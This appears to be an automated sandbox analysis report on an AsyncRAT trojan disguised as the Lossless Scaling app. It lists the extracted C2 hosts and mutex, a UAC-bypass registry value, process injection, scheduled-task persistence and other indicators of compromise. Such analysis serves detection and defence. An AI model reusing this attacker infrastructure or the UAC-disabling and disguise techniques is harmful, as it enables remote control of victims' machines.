Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
294s -
max time network
298s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system -
submitted
12/03/2025, 18:04
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
asyncrat
A 14
Default
nams.ddnsfree.com:409
aliomar.ooguy.com:409
MaterxMutex_Egypt409
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 800 powershell.exe 576 powershell.exe 3440 powershell.exe 1452 powershell.exe 768 powershell.exe 1800 powershell.exe 2924 powershell.exe 3136 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1872 LosslessScaling.exe 2404 RAR.exe 2416 dismhost.exe -
Loads dropped DLL 24 IoCs
pid Process 1872 LosslessScaling.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe 2416 dismhost.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1452 set thread context of 3664 1452 powershell.exe 133 PID 3440 set thread context of 236 3440 powershell.exe 136 PID 768 set thread context of 3544 768 powershell.exe 155 PID 1800 set thread context of 2924 1800 powershell.exe 158 PID 2924 set thread context of 2740 2924 powershell.exe 185 PID 3136 set thread context of 4624 3136 powershell.exe 187 -
Drops file in Program Files directory 31 IoCs
description ioc Process File created C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Lossless Scaling.lnk powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Lossless.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config powershell.exe File created C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\pt-BR\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\vi\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe powershell.exe File created C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\fa\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\zh-TW\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\pt-PT\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Lan.vbs powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ar\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\pl\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ro\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\zh-CN\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\bg\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ko\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\config.ini powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Licenses.txt powershell.exe File created C:\Program Files (x86)\Lossless Scaling\es-ES\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll powershell.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000\Control Panel\Colors LosslessScaling.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1408376509-1621642251-2666462513-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1408376509-1621642251-2666462513-1000\{2A3842FA-063C-4776-851B-87930613CEF3} msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4308 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\lossless scaling.zip:Zone.Identifier msedge.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1980 schtasks.exe 1524 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 236 aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 496 msedge.exe 496 msedge.exe 4068 msedge.exe 4068 msedge.exe 4140 identity_helper.exe 4140 identity_helper.exe 2360 msedge.exe 2360 msedge.exe 3684 msedge.exe 3684 msedge.exe 800 powershell.exe 800 powershell.exe 800 powershell.exe 576 powershell.exe 576 powershell.exe 576 powershell.exe 1872 LosslessScaling.exe 1872 LosslessScaling.exe 576 powershell.exe 3440 powershell.exe 3440 powershell.exe 1452 powershell.exe 1452 powershell.exe 1452 powershell.exe 3440 powershell.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe 236 aspnet_compiler.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 236 aspnet_compiler.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 29 IoCs
pid Process 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeRestorePrivilege 3896 7zG.exe Token: 35 3896 7zG.exe Token: SeSecurityPrivilege 3896 7zG.exe Token: SeSecurityPrivilege 3896 7zG.exe Token: SeRestorePrivilege 3720 7zG.exe Token: 35 3720 7zG.exe Token: SeSecurityPrivilege 3720 7zG.exe Token: SeSecurityPrivilege 3720 7zG.exe Token: SeDebugPrivilege 800 powershell.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeDebugPrivilege 1872 LosslessScaling.exe Token: SeDebugPrivilege 3440 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 236 aspnet_compiler.exe Token: SeRestorePrivilege 4792 7zG.exe Token: 35 4792 7zG.exe Token: SeSecurityPrivilege 4792 7zG.exe Token: SeSecurityPrivilege 4792 7zG.exe Token: SeBackupPrivilege 3548 Dism.exe Token: SeRestorePrivilege 3548 Dism.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 1800 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 3136 powershell.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
pid Process 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 3896 7zG.exe 3720 7zG.exe 4792 7zG.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe 4068 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1872 LosslessScaling.exe 236 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4068 wrote to memory of 1508 4068 msedge.exe 81 PID 4068 wrote to memory of 1508 4068 msedge.exe 81 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 4472 4068 msedge.exe 82 PID 4068 wrote to memory of 496 4068 msedge.exe 83 PID 4068 wrote to memory of 496 4068 msedge.exe 83 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 PID 4068 wrote to memory of 2120 4068 msedge.exe 84 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://drive.usercontent.google.com/download?id=1dL2wmMpi_uKJtoSEMETL8qLy2IJ6kU0y&export=download&authuser=01⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe6aae3cb8,0x7ffe6aae3cc8,0x7ffe6aae3cd82⤵PID:1508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:22⤵PID:4472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:82⤵PID:2120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:12⤵PID:4848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:12⤵PID:2740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:12⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:82⤵PID:3104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:12⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:12⤵PID:4048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:12⤵PID:444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6208 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:12⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:12⤵PID:5076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:12⤵PID:1400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:12⤵PID:1388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:12⤵PID:2684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6800 /prefetch:12⤵PID:2672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:12⤵PID:2516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:12⤵PID:5004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:12⤵PID:2648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7064 /prefetch:22⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:12⤵PID:5072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:12⤵PID:2340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,7591718690663587,13138651922374316760,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2572 /prefetch:12⤵PID:4872
-
-
